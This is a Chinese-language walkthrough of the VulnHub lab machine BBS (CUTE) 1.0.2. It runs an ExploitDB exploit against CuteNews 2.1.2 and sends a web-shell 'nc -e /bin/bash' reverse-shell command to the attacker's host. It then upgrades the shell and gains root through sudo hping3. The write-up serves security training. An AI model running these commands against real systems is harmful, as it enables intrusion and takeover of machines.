BBS (CUTE): 1.0.2

BBS (CUTE): 1.0.2 https://www.vulnhub.com/entry/bbs-cute-102,567/

靶场配置网络

登陆时按e 修改rw signie init=/bin/bash 按Ctrl+x 进入 root@(none) 模式

ip add 看到网卡名字叫做ens33

需要修改网卡配置文件

vi /etc/network/interfaces

allow-hotplug ens33

iface ens33 1inet dhcp

重启获得IP地址

使用目录扫描,获得

http://192.168.204.134/index.php

留意到版本号CuteNews 2.1.2

在kali上操作

searchsploit cutenews 2.1.2 看到路径

cp /usr/share/exploitdb/exploits/php/webapps/48800.py ./

修改py配置文件,将所有的/CuteNews删除

执行命令python3 48800.py

输入http://192.168.204.134获得账号名密码

登录BBS (CUTE): 1.0.2,找到注入点

http://192.168.204.134/uploads/avatar_vDnS6Pt85h_vDnS6Pt85h.php?cmd=nc -e /bin/bash 192.168.204.135 1234

在kali上连接 nc -lvvp 1234 (从KALI输入访问靶机)

python -c 'import pty;pty.spawn("/bin/bash")'

-c : 执行具体的代码

import :导入语句

pty : 终端(接口)

pty.spawn : 执行命令

export TERM=screen

stty rows 45 columns 194 (参考stty -a)

reset

通过sudo -l 查看权限

/usr/sbin/hping3 获得root权限

find / -name /root/root.txt

相关推荐
索然无味io27 分钟前
跨站请求伪造之基本介绍
前端·笔记·学习·web安全·网络安全·php
Mitch3114 小时前
【漏洞复现】CVE-2015-3337 Arbitrary File Reading
elasticsearch·网络安全·docker·漏洞复现
燕雀安知鸿鹄之志哉.4 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
Mitch3114 小时前
【漏洞复现】CVE-2015-5531 Arbitrary File Reading
web安全·elasticsearch·网络安全·docker·漏洞复现
ccc_9wy4 小时前
暗月红队考核靶场ack123的测试报告[细节](二)
网络安全·暗月ack123·socks5内网代理·mssql漏洞·杀软对抗·制作免杀木马·烂土豆提权
蜜獾云20 小时前
linux firewalld 命令详解
linux·运维·服务器·网络·windows·网络安全·firewalld
H轨迹H1 天前
#渗透测试 kioptix level 2靶机通关教程及提权
网络安全·渗透测试·oscp
AirDroid_qs1 天前
Niushop开源商城(漏洞复现)
android·网络安全·开源
星竹1 天前
upload-labs-master第21关超详细教程
网络安全